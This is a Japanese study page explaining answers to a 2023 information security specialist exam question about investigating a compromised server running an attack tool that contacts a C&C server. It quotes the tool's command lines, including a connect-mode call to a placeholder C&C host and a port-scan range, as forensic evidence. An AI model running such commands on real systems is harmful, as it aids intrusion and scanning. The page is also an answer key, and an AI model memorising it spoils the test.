【情報処理安全確保支援士試験 令和5年度 春期 午後1 問2 No.2】

情報処理安全確保支援士試験 令和5年度 春期 午後1 問2

【出典:情報処理安全確保支援士試験 令和5年度 春期 午後1 問2(一部、加工あり)】

[受付サーバのプロセスとネットワーク接続の調査]
 Mさんは、受付サーバでプロセスとネットワーク接続を調査した。psコマンドの実行結果を表2に、netstatコマンドの実行結果を表3に示す。

 srvという名称の不審なプロセスが稼働していた。Mさんがsrvファイルのハッシュ値を調べたところ、インターネット上で公開されている攻撃ツールであり、次に示す特徴をもつことが分かった。

  • C&C(Command and Control)サーバから指示を受け、子プロセスを起動してポートスキャンなど行う。
  • 外部からの接続を待ち受ける”バインドモード”と外部に自ら接続する”コネクトモード”でC&Cサーバに接続することができる。モードの指定はコマンドライン引数で行われる。
  • ポートスキャンを実行して、結果をファイルに記録する(以下、ポートスキャンの結果を記録したファイルを結果ファイルという)。さらに、SSH又はFTPのポートがオープンしている場合、利用者IDとパスワードについて、辞書攻撃を行い、その結果を結果ファイルに記録する。
  • SNMPv2cでpublicという(b)名を使って、機器のバージョン情報を取得し、結果ファイルに記録する。
  • 結果ファイルをC&Cサーバにアップロードする。

 Mさんは、表1〜表3から、次のように考えた。

  • 攻撃者は、一度、srvの(c)モードで、①C&Cサーバとの接続に失敗した後、srvの(d)モードで、②C&Cサーバとの接続に成功した
  • 攻撃者は、C&Cサーバとの接続に成功した後、ポートスキャンを実行した。ポートスキャンを実行したプロセスのPIDは、(e)であった。

 Mさんは、受付サーバが不正アクセスを受けているとU課長に報告した。U課長は、関連部署に伝え、Mさんに受付サーバをネットワークから切断するよう指示した。

b:コミュニティ

SNMPv2cでpublicという(b)名を使って、機器のバージョン情報を取得し、結果ファイルに記録する。
 SNMP(Simple Network Management Protocol)とはネットワーク機器やサーバなどを管理・監視するアプリケーションプロトコルであり、SNMPでの名前というとコミュニティ名です。
 コミュニティ名は管理対象となる機器をグループ化するもので、コミュティ名を指定することでMIB(Management Information Base)と呼ばれる機器の各種情報や稼働状態を共有することができます。
 なお、デフォルトのコミュティ名はpublicです。

c:バインド、下線①について、Mさんがそのように判断した理由を、表1中〜表3中の項番を各表から一つずつ示した上で、40字以内で答えよ。:2-3によって起動した3-3のポートへの通信が1-3で拒否されているから

攻撃者は、一度、srvの(c)モードで、①C&Cサーバとの接続に失敗した後、srvの(d)モードで、②C&Cサーバとの接続に成功した
 モードについての記述「外部からの接続を待ち受ける”バインドモード”と外部に自ら接続する”コネクトモード”でC&Cサーバに接続することができる。モードの指定はコマンドライン引数で行われる。」から、表2(ps:実行中のプロセス一覧を表示)のコマンドラインからモードを確認します。

 「-mode」と指定されている項番2-3と2-4が該当します。
 最初の項番2-3で「-mode bind」とあり、バインドモードでの接続を開始時刻「04/21 15:01」で行っているようです。
 バインドモードでは外部からの接続、つまりC&Cサーバから受付サーバへの通信であり、この接続が失敗した理由を表1(FWのログ)から探っていきます。

 日時が「04/21 15:01」以降の近辺で、送信元アドレスがC&Cサーバ、宛先アドレスが受付サーバである「192.168.0.1」であるログを確認すると、項番1-3が該当するようです。
 この通信は動作が「拒否」となりFWでブロックされていることが分かります。
 さらに宛先ポートが「8080/TCP」となっていて、これは表2の項番2-3で「./srv -c -mode bind 0.0.0.0:8080 2>&1」として受付サーバが自身のポート番号8080を起動していることと関連します。
 また、表3のnetstatコマンド(ネットワーク接続やルーティングテーブルの情報を表示)でも確認します。

 ローカルアドレスでポート番号「:8080」がLISTEN(待ち受け)状態である項番3-3が関連します。

d:コネクト、下線②について、Mさんがそのように判断した理由を、表1中〜表3中の項番を各表から一つずつ示した上で、40字以内で答えよ。:2-4によって開始された3-4の通信が1-4で許可されているから

 前の設問と同様で、今度は成功した通信になります。
 次の項番2-4で「-mode connect」とあり、コネクトモードでの接続を開始時刻「04/21 15:08」で行っているようです。
 コネクトモードでは自身からの接続、つまり受付サーバからC&Cサーバへの通信であり、この接続が成功した理由を表1(FWのログ)から探っていきます。
 日時が「04/21 15:08」以降の近辺で、送信元アドレスが受付サーバである「192.168.0.1」、宛先アドレスがC&Cサーバであるログを確認すると、項番1-4が該当するようです。
 この通信は動作が「許可」となりFWでブロックされていないことが分かります。
 さらに宛先ポートが「443/TCP」となっていて、これは表2の項番2-4で「./srv -c -mode connect a0.b0.c0.d0:443 2>&1」として受付サーバがC&Cサーバのポート番号443へ接続していることと関連します。
 また、表3のnetstatコマンドでは、外部アドレスが「a0.b0.c0.d0:443」がESTABLISHED(通信確立)状態である項番3-4が関連します。

e:1365

攻撃者は、C&Cサーバとの接続に成功した後、ポートスキャンを実行した。ポートスキャンを実行したプロセスのPIDは、(e)であった。
 C&Cサーバとの接続に成功した後の情報を表2と表3から確認します。
 表2では、項番2-5でコマンドライン「./srv -s -range 192.168.0.1-192.168.255.254」とあり、このアドレス範囲でポートスキャンを実行したと想定できます。
 また、表3では、項番3-5で受付サーバから外部アドレス「192.168.253.124:21」に、状態「SYN_SENT」(TCPの3ウェイハンドシェイクの最初のSYN送信の状態)となっており、ポートスキャンの状態と想定できます。
 いずれもPID「1365」となっています。